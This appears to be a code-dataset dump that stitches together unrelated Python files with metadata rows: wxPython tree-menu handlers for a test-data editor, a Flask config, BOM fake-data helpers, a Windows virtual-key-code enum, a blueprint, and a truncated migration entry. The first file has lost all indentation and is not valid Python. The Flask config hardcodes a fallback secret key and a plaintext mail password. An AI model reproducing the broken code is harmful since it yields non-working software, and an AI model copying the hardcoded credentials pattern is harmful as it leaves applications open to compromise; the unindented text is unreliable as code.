_label_new_scalar = 'New Scalar\tCtrl-Shift-V'
_label_new_list_variable = 'New List Variable\tCtrl-Shift-L'
_label_new_dict_variable = 'New Dictionary Variable'
_label_change_format = 'Change Format'
_label_copy_macro = 'Copy\tCtrl-Shift-C'
_label_rename = 'Rename\tF2'
_label_add_resource = 'Add Resource'
_label_new_resource = 'New Resource'
_label_find_usages = 'Find Usages'
_label_select_all = 'Select All Tests'
_label_deselect_all = 'Deselect All Tests'
_label_select_failed_tests = 'Select Only Failed Tests'
_label_select_passed_tests = 'Select Only Passed Tests'
_label_delete = 'Delete\tCtrl-Shift-D'
_label_delete_no_kbsc = 'Delete'
_label_exclude = 'Exclude'
_label_include = 'Include'
_label_expand_all = 'Expand all'
_label_collapse_all = 'Collapse all'
def __init__(self, controller, tree, node, settings):
wx.Window.__init__(self, tree)
self.controller = controller
self._tree = tree
self._node = node
self._settings = settings
self._rendered = False
self.Show(False)
self._popup_creator = tree._popup_creator
@property
def item(self):
return self.controller.data
@property
def node(self):
return self._node
def show_popup(self):
self._popup_creator.show(self, PopupMenuItems(self, self._actions),
self.controller)
def begin_label_edit(self):
return False
def double_clicked(self):
pass
def end_label_edit(self, event):
pass
def OnDelete(self, event):
pass
def OnNewSuite(self, event):
pass
def OnNewDirectory(self, event):
pass
def OnNewResource(self, event):
pass
def OnNewUserKeyword(self, event):
pass
def OnNewTestCase(self, event):
pass
def OnNewScalar(self, event):
pass
def OnNewListVariable(self, event):
pass
def OnNewDictionaryVariable(self, event):
pass
def OnCopy(self, event):
pass
def OnFindUsages(self, event):
pass
def OnSelectAllTests(self, event):
self._tree.SelectAllTests(self._node)
def OnDeselectAllTests(self, event):
self._tree.DeselectAllTests(self._node)
def OnSelectOnlyFailedTests(self, event):
self._tree.SelectFailedTests(self._node)
def OnSelectOnlyPassedTests(self, event):
self._tree.SelectPassedTests(self._node)
def OnSafeDelete(self, event):
pass
def OnExclude(self, event):
pass
def OnInclude(self, event):
pass
class _CanBeRenamed(object):
def OnRename(self, event):
self._tree.label_editor.OnLabelEdit()
def begin_label_edit(self):
def label_edit():
# FIXME: yep.yep.yep.yep.yep
node = self._tree._controller.find_node_by_controller(
self.controller)
if node:
self._tree.EditLabel(node)
# Must handle pending events before label edit
# This is a fix for situations where there is a pending action
# that will change this label (Text Editor all changing actions)
wx.CallAfter(label_edit)
return True
def end_label_edit(self, event):
if not event.IsEditCancelled():
if self._is_valid_rename(event.GetLabel()):
self.rename(event.GetLabel())
else:
event.Veto()
def _is_valid_rename(self, label):
validation = self.controller.validate_name(label)
if validation.error_message:
self._show_validation_error(validation.error_message)
return False
return True
def _show_validation_error(self, err_msg):
wx.MessageBox(err_msg, 'Validation Error', style=wx.ICON_ERROR)
class DirectoryHandler(_ActionHandler):
is_draggable = False
is_test_suite = False
can_be_rendered = False
_actions = [_ActionHandler._label_new_resource]
def OnNewResource(self, event):
NewResourceDialog(self.controller, self._settings).execute()
class TestDataHandler(_ActionHandler):
accepts_drag = lambda self, dragged: \
(isinstance(dragged, UserKeywordHandler) or
isinstance(dragged, VariableHandler))
is_draggable = False
is_test_suite = True
@property
def tests(self):
return self.controller.tests
@property
def keywords(self):
return self.controller.keywords
@property
def variables(self):
return self.controller.variables
def has_been_modified_on_disk(self):
return self.item.has_been_modified_on_disk()
def do_drop(self, item):
self.controller.add_test_or_keyword(item)
def rename(self, new_name):
return False
def OnSortKeywords(self, event):
"""Sorts the keywords inside the treenode"""
self.controller.execute(SortKeywords())
@property
def can_be_rendered(self):
if not self._has_children():
return False
return not self._rendered
def _has_children(self):
return (self.item.keyword_table or self.item.testcase_table or
self.item.variable_table)
def set_rendered(self):
self._rendered = True
def OnChangeFormat(self, event):
ChangeFormatDialog(self.controller).execute()
def OnNewUserKeyword(self, event):
dlg = UserKeywordNameDialog(self.controller)
if dlg.ShowModal() == wx.ID_OK:
self.controller.execute(AddKeyword(dlg.get_name(), dlg.get_args()))
dlg.Destroy()
def OnNewScalar(self, event):
self._new_var(ScalarVariableDialog)
def OnNewListVariable(self, event):
class FakePlugin(object):
global_settings = self._settings
self._new_var(ListVariableDialog, plugin=FakePlugin())
def OnNewDictionaryVariable(self, event):
class FakePlugin(object):
global_settings = self._settings
self._new_var(DictionaryVariableDialog, plugin=FakePlugin())
def _new_var(self, dialog_class, plugin=None):
dlg = dialog_class(self._var_controller, plugin=plugin)
if dlg.ShowModal() == wx.ID_OK:
name, value = dlg.get_value()
comment = dlg.get_comment()
self.controller.execute(AddVariable(name, value, comment))
@property
def _var_controller(self):
return self.controller.datafile_controller.variables
class TestDataDirectoryHandler(TestDataHandler):
def __init__(self, *args):
TestDataHandler.__init__(self, *args)
self._actions = [
_ActionHandler._label_add_suite,
_ActionHandler._label_add_directory,
_ActionHandler._label_new_resource,
'---',
_ActionHandler._label_new_user_keyword,
_ActionHandler._label_new_scalar,
_ActionHandler._label_new_list_variable,
_ActionHandler._label_new_dict_variable,
'---',
_ActionHandler._label_change_format
]
if self.controller.parent:
self._actions.extend([_ActionHandler._label_delete_no_kbsc])
self._actions.extend([
'---',
_ActionHandler._label_select_all,
_ActionHandler._label_deselect_all,
_ActionHandler._label_select_failed_tests,
_ActionHandler._label_select_passed_tests
])
if self.controller.parent:
self._actions.extend(['---',
_ActionHandler._label_exclude])
self._actions.extend(['---',
_ActionHandler._label_expand_all,
_ActionHandler._label_collapse_all])
def OnExpandAll(self, event):
self._tree.ExpandAllSubNodes(self._node)
def OnCollapseAll(self, event):
self._tree.CollapseAllSubNodes(self._node)
def OnNewSuite(self, event):
AddSuiteDialog(self.controller, self._settings).execute()
def OnNewDirectory(self, event):
AddDirectoryDialog(self.controller, self._settings).execute()
def OnNewResource(self, event):
NewResourceDialog(self.controller, self._settings).execute()
def OnDelete(self, event):
FolderDeleteDialog(self.controller).execute()
def OnExclude(self, event):
try:
self.controller.execute(Exclude())
except DirtyRobotDataException:
wx.MessageBox('Directory contains unsaved data!\n'
'You must save data before excluding.')
class _FileHandlerThanCanBeRenamed(_CanBeRenamed):
@overrides(_CanBeRenamed)
def begin_label_edit(self):
self._old_label = self._node.GetText()
self._set_node_label(self.controller.basename)
return _CanBeRenamed.begin_label_edit(self)
@overrides(_CanBeRenamed)
def end_label_edit(self, event):
if not event.IsEditCancelled():
result = self.controller.execute(
self._rename_command(event.GetLabel()))
if result:
self._rename_ok_handler()
self._old_label = self.controller.basename
else:
event.Veto()
else:
self._set_node_label(self._old_label)
def _rename_ok_handler(self):
pass
def _rename_command(self, label):
raise NotImplementedError(self.__class__)
def _set_node_label(self, label):
self._tree.SetItemText(self._node, label)
class ResourceFileHandler(_FileHandlerThanCanBeRenamed, TestDataHandler):
is_test_suite = False
_actions = [_ActionHandler._label_new_user_keyword,
_ActionHandler._label_new_scalar,
_ActionHandler._label_new_list_variable,
_ActionHandler._label_new_dict_variable,
'---',
_ActionHandler._label_rename,
_ActionHandler._label_change_format,
_ActionHandler._label_sort_keywords,
_ActionHandler._label_find_usages,
_ActionHandler._label_delete]
def OnFindUsages(self, event):
ResourceFileUsages(self.controller, self._tree.highlight).show()
def OnDelete(self, event):
ResourceDeleteDialog(self.controller).execute()
def OnSafeDelete(self, event):
return self.OnDelete(event)
@overrides(_FileHandlerThanCanBeRenamed)
def _rename_command(self, label):
return RenameResourceFile(
label, self._check_should_rename_static_imports)
def _check_should_rename_static_imports(self):
return ResourceRenameDialog(self.controller).execute()
class TestCaseFileHandler(_FileHandlerThanCanBeRenamed, TestDataHandler):
accepts_drag = lambda *args: True
_actions = [_ActionHandler._label_new_test_case,
_ActionHandler._label_new_user_keyword,
_ActionHandler._label_new_scalar,
_ActionHandler._label_new_list_variable,
_ActionHandler._label_new_dict_variable,
'---',
_ActionHandler._label_rename,
_ActionHandler._label_change_format,
_ActionHandler._label_sort_keywords,
_ActionHandler._label_delete,
'---',
_ActionHandler._label_select_all,
_ActionHandler._label_deselect_all,
_ActionHandler._label_select_failed_tests,
_ActionHandler._label_select_passed_tests
]
def OnNewTestCase(self, event):
dlg = TestCaseNameDialog(self.controller)
if dlg.ShowModal() == wx.ID_OK:
self.controller.execute(AddTestCase(dlg.get_name()))
dlg.Destroy()
def OnDelete(self, event):
if wx.MessageBox('Delete test case file', caption='Confirm',
style=wx.YES_NO | wx.ICON_QUESTION) == wx.YES:
self.controller.execute(DeleteFile())
def OnSafeDelete(self, event):
return self.OnDelete(event)
@overrides(_FileHandlerThanCanBeRenamed)
def _rename_command(self, label):
return RenameFile(label)
@overrides(_FileHandlerThanCanBeRenamed)
def _rename_ok_handler(self):
self._tree.DeselectAllTests(self._node)
class _TestOrUserKeywordHandler(_CanBeRenamed, _ActionHandler):
accepts_drag = lambda *args: False
is_draggable = True
_actions = [
_ActionHandler._label_copy_macro, 'Move Up\tCtrl-Up',
'Move Down\tCtrl-Down', _ActionHandler._label_rename, '---', 'Delete'
]
def remove(self):
self.controller.delete()
def rename(self, new_name):
self.controller.execute(self._create_rename_command(new_name))
def OnCopy(self, event):
dlg = self._copy_name_dialog_class(self.controller, self.item)
if dlg.ShowModal() == wx.ID_OK:
self.controller.execute(CopyMacroAs(dlg.get_name()))
dlg.Destroy()
def OnMoveUp(self, event):
if self.controller.move_up():
self._tree.move_up(self._node)
def OnMoveDown(self, event):
if self.controller.move_down():
self._tree.move_down(self._node)
def OnDelete(self, event):
self.controller.execute(RemoveMacro(self.controller))
class TestCaseHandler(_TestOrUserKeywordHandler):
_datalist = property(lambda self: self.item.datalist)
_copy_name_dialog_class = TestCaseNameDialog
def _add_copy_to_tree(self, parent_node, copied):
self._tree.add_test(parent_node, copied)
def _create_rename_command(self, new_name):
return RenameTest(new_name)
class UserKeywordHandler(_TestOrUserKeywordHandler):
is_user_keyword = True
_datalist = property(lambda self: self.item.datalist)
_copy_name_dialog_class = CopyUserKeywordDialog
_actions = _TestOrUserKeywordHandler._actions + [
_ActionHandler._label_find_usages]
def _add_copy_to_tree(self, parent_node, copied):
self._tree.add_keyword(parent_node, copied)
def _create_rename_command(self, new_name):
return RenameKeywordOccurrences(
self.controller.name, new_name,
RenameProgressObserver(self.GetParent().GetParent()),
self.controller.info)
def OnFindUsages(self, event):
Usages(self.controller, self._tree.highlight).show()
class VariableHandler(_CanBeRenamed, _ActionHandler):
accepts_drag = lambda *args: False
is_draggable = True
is_variable = True
OnMoveUp = OnMoveDown = lambda *args: None
_actions = [_ActionHandler._label_rename, 'Delete']
@overrides(_ActionHandler)
def double_clicked(self):
RideOpenVariableDialog(controller=self.controller).publish()
def OnDelete(self, event):
self.remove()
def remove(self):
self.controller.delete()
def rename(self, new_name):
self.controller.execute(UpdateVariableName(new_name))
@property
def index(self):
return self.controller.index
class ResourceRootHandler(_ActionHandler):
can_be_rendered = is_draggable = is_user_keyword = is_test_suite = False
rename = lambda self, new_name: False
accepts_drag = lambda self, dragged: False
_actions = [_ActionHandler._label_add_resource]
@property
def item(self):
return None
def OnAddResource(self, event):
path = RobotFilePathDialog(
self, self.controller, self._settings).execute()
if path:
self.controller.load_resource(path, LoadProgressObserver(self))
class ExcludedDirectoryHandler(TestDataDirectoryHandler):
is_draggable = False
is_test_suite = True
def __init__(self, *args):
TestDataHandler.__init__(self, *args)
self._actions = [_ActionHandler._label_include]
def OnInclude(self, event):
self.controller.execute(Include())
| 33.598958
| 80
| 0.661965
| 16,783
| 0.867204
| 0
| 0
| 1,914
| 0.098899
| 0
| 0
| 1,532
| 0.079161
|
426e4afa33488c3f61e9819e1e0e8ab285e730fe
| 902
|
py
|
Python
|
config.py
|
rajatomar788/pyblog
|
d450dc1ceb3a6b3aeb747648a0fb1b4334e4b3ae
|
[
"MIT"
] | null | null | null |
config.py
|
rajatomar788/pyblog
|
d450dc1ceb3a6b3aeb747648a0fb1b4334e4b3ae
|
[
"MIT"
] | null | null | null |
config.py
|
rajatomar788/pyblog
|
d450dc1ceb3a6b3aeb747648a0fb1b4334e4b3ae
|
[
"MIT"
] | null | null | null |
import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config(object):
SECRET_KEY = os.environ.get('SECRET_KEY') or 'rajatomar788'
if os.environ.get('DATABASE_URL') is None:
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'app.db')
elif os.environ.get('EXTRA_DATABASE') is not None:
SQLALCHEMY_DATABASE_URI = os.environ['EXTRA_DATABASE']
else:
SQLALCHEMY_DATABASE_URI = os.environ['DATABASE_URL']
SQLALCHEMY_TRACK_MODIFICATIONS = False
MAX_SEARCH_RESULTS = 50
POSTS_PER_PAGE = 20
basedir = basedir
ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])
MAX_CONTENT_PATH = 16*1024*1024
#mail server settings
MAIL_SERVER = 'localhost'
MAIL_PORT = 25
MAIL_USERNAME = 'Raja'
MAIL_PASSWORD = 'raja788'
#administrator list
ADMINS = ['rajatomar788@gmail.com']
| 29.096774
| 80
| 0.674058
| 837
| 0.927938
| 0
| 0
| 0
| 0
| 0
| 0
| 227
| 0.251663
|
426e9a71b5a0425ef77735be32bb8398f28a2e1e
| 45
|
py
|
Python
|
ceefax/fonts/size7extracondensed/__init__.py
|
mscroggs/CEEFAX
|
8e7a075de1809064b77360da24ebbbaa409c3bf2
|
[
"MIT"
] | 1
|
2020-03-28T15:53:22.000Z
|
2020-03-28T15:53:22.000Z
|
ceefax/fonts/size7extracondensed/__init__.py
|
mscroggs/CEEFAX
|
8e7a075de1809064b77360da24ebbbaa409c3bf2
|
[
"MIT"
] | 1
|
2021-02-05T13:43:52.000Z
|
2021-02-05T13:43:52.000Z
|
ceefax/fonts/size7extracondensed/__init__.py
|
mscroggs/CEEFAX
|
8e7a075de1809064b77360da24ebbbaa409c3bf2
|
[
"MIT"
] | null | null | null |
from .default import size7extracondensedfont
| 22.5
| 44
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
426e9a7b517f49d7e52664e4ad563ce95c7c8446
| 3,433
|
py
|
Python
|
bom/helpers.py
|
gxyp/indabom
|
114991be2471eda2cf658c68706ab7bb05b06959
|
[
"MIT"
] | null | null | null |
bom/helpers.py
|
gxyp/indabom
|
114991be2471eda2cf658c68706ab7bb05b06959
|
[
"MIT"
] | null | null | null |
bom/helpers.py
|
gxyp/indabom
|
114991be2471eda2cf658c68706ab7bb05b06959
|
[
"MIT"
] | null | null | null |
from bom.octopart_parts_match import match_part
from bom.models import Part, PartClass, Seller, SellerPart, Subpart, \
Manufacturer, Organization, PartFile
def create_a_fake_organization(user, free=False):
org = Organization(
name="Atlas",
subscription='F' if free else 'P',
owner=user)
org.save()
return org
def create_some_fake_part_classes():
pc1 = PartClass(code=500, name='Wendy', comment='Mechanical Switches')
pc1.save()
pc2 = PartClass(code=200, name='Archibald', comment='')
pc2.save()
pc3 = PartClass(code=503, name='Ghost', comment='Like Kasper')
pc3.save()
return pc1, pc2, pc3
def create_a_fake_subpart(assembly_part, assembly_subpart, count=4):
sp1 = Subpart(
assembly_part=assembly_part,
assembly_subpart=assembly_subpart,
count=count)
sp1.save()
return sp1
def create_some_fake_sellers(organization):
s1 = Seller(name='Mouser', organization=organization)
s1.save()
s2 = Seller(name='Digi-Key', organization=organization)
s2.save()
s3 = Seller(name='Archibald', organization=organization)
s3.save()
return s1, s2, s3
def create_some_fake_manufacturers(organization):
m1 = Manufacturer(name='STMicroelectronics', organization=organization)
m1.save()
m2 = Manufacturer(name='Nordic Semiconductor', organization=organization)
m2.save()
m3 = Manufacturer(name='Murata', organization=organization)
m3.save()
return m1, m2, m3
def create_a_fake_seller_part(
seller,
part,
moq,
mpq,
unit_cost,
lead_time_days):
sp1 = SellerPart(
seller=seller,
part=part,
minimum_order_quantity=moq,
minimum_pack_quantity=mpq,
unit_cost=unit_cost,
lead_time_days=lead_time_days)
sp1.save()
return sp1
def create_some_fake_parts(organization):
(pc1, pc2, pc3) = create_some_fake_part_classes()
(m1, m2, m3) = create_some_fake_manufacturers(organization=organization)
pt1 = Part(
manufacturer_part_number='STM32F401CEU6',
number_class=pc2,
number_item='3333',
description='Brown dog',
revision='1',
manufacturer=m1,
organization=organization)
pt1.save()
pt2 = Part(
manufacturer_part_number='GRM1555C1H100JA01D',
number_class=pc1,
description='',
manufacturer=None,
organization=organization)
pt2.save()
pt3 = Part(
manufacturer_part_number='NRF51822',
number_class=pc3,
description='Friendly ghost',
manufacturer=m3,
organization=organization)
pt3.save()
create_a_fake_subpart(pt1, pt2)
create_a_fake_subpart(pt1, pt3, count=10)
(s1, s2, s3) = create_some_fake_sellers(organization=organization)
create_a_fake_seller_part(
s1,
pt1,
moq=None,
mpq=None,
unit_cost=None,
lead_time_days=None)
create_a_fake_seller_part(
s2,
pt1,
moq=1000,
mpq=5000,
unit_cost=0.1005,
lead_time_days=7)
create_a_fake_seller_part(
s2,
pt2,
moq=200,
mpq=200,
unit_cost=0,
lead_time_days=47)
return pt1, pt2, pt3
def create_a_fake_partfile(file, part):
pf1 = PartFile(file=None, part=part)
pf1.save()
return pf1
| 23.040268
| 77
| 0.642587
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 236
| 0.068745
|
426f6bd9b353f10dd5dac6c8afa818c7319f5d74
| 8,612
|
py
|
Python
|
keycodes/key/codes/win.py
|
jonchun/ptoys-mapper
|
a2dde413d37e897ec41b69ac979e538afb7435f0
|
[
"MIT"
] | null | null | null |
keycodes/key/codes/win.py
|
jonchun/ptoys-mapper
|
a2dde413d37e897ec41b69ac979e538afb7435f0
|
[
"MIT"
] | null | null | null |
keycodes/key/codes/win.py
|
jonchun/ptoys-mapper
|
a2dde413d37e897ec41b69ac979e538afb7435f0
|
[
"MIT"
] | null | null | null |
# Source:
# https://github.com/tpn/winsdk-10/blob/46c66795f49679eb4783377968ce25f6c778285a/Include/10.0.10240.0/um/WinUser.h
# # convert all C-style comments to python multi-line string comment
# find: (^/\*[\s\S\r]+?\*/)
# replace: """\n$1\n"""
# # convert all keycode #defines to be python constants
# find: #define\s(.+_.+?)\s+([\w]+)(\s*)(/[/*].+)?
# replace: $1 = $2$3# $4\n
# # clean up results by removing lines with only a single # caused by previous regex
# find: ^# $\n
# replace:
# # clean up duplicate newlines
# find: (\s#.+\n)\n
# replace: $1
# # clean up multi-line comments.
# find: ^(\s{3,})(\S.+)
# replace: $1 # $2
from enum import IntEnum
class WinCodes(IntEnum):
"""
/*
* Virtual Keys, Standard Set
*/
"""
VK_LBUTTON = 0x01
VK_RBUTTON = 0x02
VK_CANCEL = 0x03
VK_MBUTTON = 0x04 # /* NOT contiguous with L & RBUTTON */
# if(_WIN32_WINNT >= 0x0500)
VK_XBUTTON1 = 0x05 # /* NOT contiguous with L & RBUTTON */
VK_XBUTTON2 = 0x06 # /* NOT contiguous with L & RBUTTON */
# endif /* _WIN32_WINNT >= 0x0500 */
"""
/*
* 0x07 : reserved
*/
"""
VK_BACK = 0x08
VK_TAB = 0x09
"""
/*
* 0x0A - 0x0B : reserved
*/
"""
VK_CLEAR = 0x0C
VK_RETURN = 0x0D
"""
/*
* 0x0E - 0x0F : unassigned
*/
"""
VK_SHIFT = 0x10
VK_CONTROL = 0x11
VK_MENU = 0x12
VK_PAUSE = 0x13
VK_CAPITAL = 0x14
VK_KANA = 0x15
VK_HANGEUL = 0x15 # /* old name - should be here for compatibility */
VK_HANGUL = 0x15
"""
/*
* 0x16 : unassigned
*/
"""
VK_JUNJA = 0x17
VK_FINAL = 0x18
VK_HANJA = 0x19
VK_KANJI = 0x19
"""
/*
* 0x1A : unassigned
*/
"""
VK_ESCAPE = 0x1B
VK_CONVERT = 0x1C
VK_NONCONVERT = 0x1D
VK_ACCEPT = 0x1E
VK_MODECHANGE = 0x1F
VK_SPACE = 0x20
VK_PRIOR = 0x21
VK_NEXT = 0x22
VK_END = 0x23
VK_HOME = 0x24
VK_LEFT = 0x25
VK_UP = 0x26
VK_RIGHT = 0x27
VK_DOWN = 0x28
VK_SELECT = 0x29
VK_PRINT = 0x2A
VK_EXECUTE = 0x2B
VK_SNAPSHOT = 0x2C
VK_INSERT = 0x2D
VK_DELETE = 0x2E
VK_HELP = 0x2F
"""
/*
* VK_0 - VK_9 are the same as ASCII '0' - '9' (0x30 - 0x39)
* 0x3A - 0x40 : unassigned
* VK_A - VK_Z are the same as ASCII 'A' - 'Z' (0x41 - 0x5A)
*/
"""
VK_0 = 0x30
VK_1 = 0x31
VK_2 = 0x32
VK_3 = 0x33
VK_4 = 0x34
VK_5 = 0x35
VK_6 = 0x36
VK_7 = 0x37
VK_8 = 0x38
VK_9 = 0x39
VK_A = 0x41
VK_B = 0x42
VK_C = 0x43
VK_D = 0x44
VK_E = 0x45
VK_F = 0x46
VK_G = 0x47
VK_H = 0x48
VK_I = 0x49
VK_J = 0x4A
VK_K = 0x4B
VK_L = 0x4C
VK_M = 0x4D
VK_N = 0x4E
VK_O = 0x4F
VK_P = 0x50
VK_Q = 0x51
VK_R = 0x52
VK_S = 0x53
VK_T = 0x54
VK_U = 0x55
VK_V = 0x56
VK_W = 0x57
VK_X = 0x58
VK_Y = 0x59
VK_Z = 0x5A
VK_LWIN = 0x5B
VK_RWIN = 0x5C
VK_APPS = 0x5D
"""
/*
* 0x5E : reserved
*/
"""
VK_SLEEP = 0x5F
VK_NUMPAD0 = 0x60
VK_NUMPAD1 = 0x61
VK_NUMPAD2 = 0x62
VK_NUMPAD3 = 0x63
VK_NUMPAD4 = 0x64
VK_NUMPAD5 = 0x65
VK_NUMPAD6 = 0x66
VK_NUMPAD7 = 0x67
VK_NUMPAD8 = 0x68
VK_NUMPAD9 = 0x69
VK_MULTIPLY = 0x6A
VK_ADD = 0x6B
VK_SEPARATOR = 0x6C
VK_SUBTRACT = 0x6D
VK_DECIMAL = 0x6E
VK_DIVIDE = 0x6F
VK_F1 = 0x70
VK_F2 = 0x71
VK_F3 = 0x72
VK_F4 = 0x73
VK_F5 = 0x74
VK_F6 = 0x75
VK_F7 = 0x76
VK_F8 = 0x77
VK_F9 = 0x78
VK_F10 = 0x79
VK_F11 = 0x7A
VK_F12 = 0x7B
VK_F13 = 0x7C
VK_F14 = 0x7D
VK_F15 = 0x7E
VK_F16 = 0x7F
VK_F17 = 0x80
VK_F18 = 0x81
VK_F19 = 0x82
VK_F20 = 0x83
VK_F21 = 0x84
VK_F22 = 0x85
VK_F23 = 0x86
VK_F24 = 0x87
# if(_WIN32_WINNT >= 0x0604)
"""
/*
* 0x88 - 0x8F : UI navigation
*/
"""
VK_NAVIGATION_VIEW = 0x88
VK_NAVIGATION_MENU = 0x89
VK_NAVIGATION_UP = 0x8A
VK_NAVIGATION_DOWN = 0x8B
VK_NAVIGATION_LEFT = 0x8C
VK_NAVIGATION_RIGHT = 0x8D
VK_NAVIGATION_ACCEPT = 0x8E
VK_NAVIGATION_CANCEL = 0x8F
# endif /* _WIN32_WINNT >= 0x0604 */
VK_NUMLOCK = 0x90
VK_SCROLL = 0x91
"""
/*
* NEC PC-9800 kbd definitions
*/
"""
VK_OEM_NEC_EQUAL = 0x92 # // '=' key on numpad
"""
/*
* Fujitsu/OASYS kbd definitions
*/
"""
VK_OEM_FJ_JISHO = 0x92 # // 'Dictionary' key
VK_OEM_FJ_MASSHOU = 0x93 # // 'Unregister word' key
VK_OEM_FJ_TOUROKU = 0x94 # // 'Register word' key
VK_OEM_FJ_LOYA = 0x95 # // 'Left OYAYUBI' key
VK_OEM_FJ_ROYA = 0x96 # // 'Right OYAYUBI' key
"""
/*
* 0x97 - 0x9F : unassigned
*/
"""
"""
/*
* VK_L* & VK_R* - left and right Alt, Ctrl and Shift virtual keys.
* Used only as parameters to GetAsyncKeyState() and GetKeyState().
* No other API or message will distinguish left and right keys in this way.
*/
"""
VK_LSHIFT = 0xA0
VK_RSHIFT = 0xA1
VK_LCONTROL = 0xA2
VK_RCONTROL = 0xA3
VK_LMENU = 0xA4
VK_RMENU = 0xA5
# if(_WIN32_WINNT >= 0x0500)
VK_BROWSER_BACK = 0xA6
VK_BROWSER_FORWARD = 0xA7
VK_BROWSER_REFRESH = 0xA8
VK_BROWSER_STOP = 0xA9
VK_BROWSER_SEARCH = 0xAA
VK_BROWSER_FAVORITES = 0xAB
VK_BROWSER_HOME = 0xAC
VK_VOLUME_MUTE = 0xAD
VK_VOLUME_DOWN = 0xAE
VK_VOLUME_UP = 0xAF
VK_MEDIA_NEXT_TRACK = 0xB0
VK_MEDIA_PREV_TRACK = 0xB1
VK_MEDIA_STOP = 0xB2
VK_MEDIA_PLAY_PAUSE = 0xB3
VK_LAUNCH_MAIL = 0xB4
VK_LAUNCH_MEDIA_SELECT = 0xB5
VK_LAUNCH_APP1 = 0xB6
VK_LAUNCH_APP2 = 0xB7
# endif /* _WIN32_WINNT >= 0x0500 */
"""
/*
* 0xB8 - 0xB9 : reserved
*/
"""
VK_OEM_1 = 0xBA # // ';:' for US
VK_OEM_PLUS = 0xBB # // '+' any country
VK_OEM_COMMA = 0xBC # // ',' any country
VK_OEM_MINUS = 0xBD # // '-' any country
VK_OEM_PERIOD = 0xBE # // '.' any country
VK_OEM_2 = 0xBF # // '/?' for US
VK_OEM_3 = 0xC0 # // '`~' for US
"""
/*
* 0xC1 - 0xC2 : reserved
*/
"""
# if(_WIN32_WINNT >= 0x0604)
"""
/*
* 0xC3 - 0xDA : Gamepad input
*/
"""
VK_GAMEPAD_A = 0xC3
VK_GAMEPAD_B = 0xC4
VK_GAMEPAD_X = 0xC5
VK_GAMEPAD_Y = 0xC6
VK_GAMEPAD_RIGHT_SHOULDER = 0xC7
VK_GAMEPAD_LEFT_SHOULDER = 0xC8
VK_GAMEPAD_LEFT_TRIGGER = 0xC9
VK_GAMEPAD_RIGHT_TRIGGER = 0xCA
VK_GAMEPAD_DPAD_UP = 0xCB
VK_GAMEPAD_DPAD_DOWN = 0xCC
VK_GAMEPAD_DPAD_LEFT = 0xCD
VK_GAMEPAD_DPAD_RIGHT = 0xCE
VK_GAMEPAD_MENU = 0xCF
VK_GAMEPAD_VIEW = 0xD0
VK_GAMEPAD_LEFT_THUMBSTICK_BUTTON = 0xD1
VK_GAMEPAD_RIGHT_THUMBSTICK_BUTTON = 0xD2
VK_GAMEPAD_LEFT_THUMBSTICK_UP = 0xD3
VK_GAMEPAD_LEFT_THUMBSTICK_DOWN = 0xD4
VK_GAMEPAD_LEFT_THUMBSTICK_RIGHT = 0xD5
VK_GAMEPAD_LEFT_THUMBSTICK_LEFT = 0xD6
VK_GAMEPAD_RIGHT_THUMBSTICK_UP = 0xD7
VK_GAMEPAD_RIGHT_THUMBSTICK_DOWN = 0xD8
VK_GAMEPAD_RIGHT_THUMBSTICK_RIGHT = 0xD9
VK_GAMEPAD_RIGHT_THUMBSTICK_LEFT = 0xDA
# endif /* _WIN32_WINNT >= 0x0604 */
VK_OEM_4 = 0xDB # // '[{' for US
VK_OEM_5 = 0xDC # // '\|' for US
VK_OEM_6 = 0xDD # // ']}' for US
VK_OEM_7 = 0xDE # // ''"' for US
VK_OEM_8 = 0xDF
"""
/*
* 0xE0 : reserved
*/
"""
"""
/*
* Various extended or enhanced keyboards
*/
"""
VK_OEM_AX = 0xE1 # // 'AX' key on Japanese AX kbd
VK_OEM_102 = 0xE2 # // "<>" or "\|" on RT 102-key kbd.
VK_ICO_HELP = 0xE3 # // Help key on ICO
VK_ICO_00 = 0xE4 # // 00 key on ICO
# if(WINVER >= 0x0400)
VK_PROCESSKEY = 0xE5
# endif /* WINVER >= 0x0400 */
VK_ICO_CLEAR = 0xE6
# if(_WIN32_WINNT >= 0x0500)
VK_PACKET = 0xE7
# endif /* _WIN32_WINNT >= 0x0500 */
"""
/*
* 0xE8 : unassigned
*/
"""
"""
/*
* Nokia/Ericsson definitions
*/
"""
VK_OEM_RESET = 0xE9
VK_OEM_JUMP = 0xEA
VK_OEM_PA1 = 0xEB
VK_OEM_PA2 = 0xEC
VK_OEM_PA3 = 0xED
VK_OEM_WSCTRL = 0xEE
VK_OEM_CUSEL = 0xEF
VK_OEM_ATTN = 0xF0
VK_OEM_FINISH = 0xF1
VK_OEM_COPY = 0xF2
VK_OEM_AUTO = 0xF3
VK_OEM_ENLW = 0xF4
VK_OEM_BACKTAB = 0xF5
VK_ATTN = 0xF6
VK_CRSEL = 0xF7
VK_EXSEL = 0xF8
VK_EREOF = 0xF9
VK_PLAY = 0xFA
VK_ZOOM = 0xFB
VK_NONAME = 0xFC
VK_PA1 = 0xFD
VK_OEM_CLEAR = 0xFE
"""
/*
* 0xFF : reserved
*/
"""
# Custom Value Added
VK_DISABLED = 0x100
| 20.407583
| 114
| 0.576637
| 7,941
| 0.922085
| 0
| 0
| 0
| 0
| 0
| 0
| 3,092
| 0.359034
|
426fdd67326d3cc89802cd8abeba99af022807c1
| 117
|
py
|
Python
|
application/flicket_errors/__init__.py
|
abbas0001/flicket
|
547a5e783cccf157d10df88608440aa2919d7e7b
|
[
"MIT"
] | null | null | null |
application/flicket_errors/__init__.py
|
abbas0001/flicket
|
547a5e783cccf157d10df88608440aa2919d7e7b
|
[
"MIT"
] | null | null | null |
application/flicket_errors/__init__.py
|
abbas0001/flicket
|
547a5e783cccf157d10df88608440aa2919d7e7b
|
[
"MIT"
] | null | null | null |
#! python3
# -*- coding: utf-8 -*-
#
from flask import Blueprint
bp_errors = Blueprint('flicket-errors', __name__)
| 14.625
| 49
| 0.683761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 50
| 0.42735
|
4270b9f3f72e8e2eb3176ce2f540c1dc258f357c
| 399
|
py
|
Python
|
SmartBuild/modules/migrations/0003_module_shortcut.py
|
ampamo/smart-build
|
a0c9a3871eb7ca06a6cd6d4a15aba70e2291f4fb
|
[
"CC0-1.0"
